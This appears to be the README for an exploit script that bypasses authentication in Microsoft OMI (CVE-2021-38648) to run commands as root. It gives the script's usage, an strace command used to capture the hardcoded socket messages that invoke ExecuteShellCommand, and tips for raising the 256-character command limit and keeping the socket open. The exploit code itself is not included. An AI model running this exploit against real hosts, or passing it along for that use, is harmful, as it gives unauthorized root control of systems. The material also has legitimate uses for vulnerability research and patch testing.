# CVE-2021-38648 Microsoft OMI Management Interface Authentication Bypass

This is an LPE exploit for CVE-2021-38648.

## Usage

```
usage: cve_2021_38648.py [-h] [-s SOCKET_PATH] [--timeout TIMEOUT] command

positional arguments:
  command               the command to run

optional arguments:
  -h, --help            show this help message and exit
  -s SOCKET_PATH, --socket SOCKET_PATH
                        socket file
  --timeout TIMEOUT     response timeout
```

The exploit will exit with a status of 0 on success. The command is limited to 256 characters in length due to the
hardcoded messages that are exchanged. To increase this, generate a new series of messages using the `strace` command
below, search for the second `writev` syscall and extract each `iovec` instance. There should be six in total, and the
first 4 bytes of each should be consistent.

The hardcoded messages were recovered using:

```
strace -v -s 5000 -f -xx -e trace=socket,connect,write,writev,close \
    /opt/omi/bin/omicli iv root/scx { SCX_OperatingSystem } ExecuteShellCommand { command '...' timeout 0 }
```

It is important that the exploit wait on the socket for a response to be received. The response doesn't need to be read, but the
socket needs to be kept open until either the server closes it or the response is received.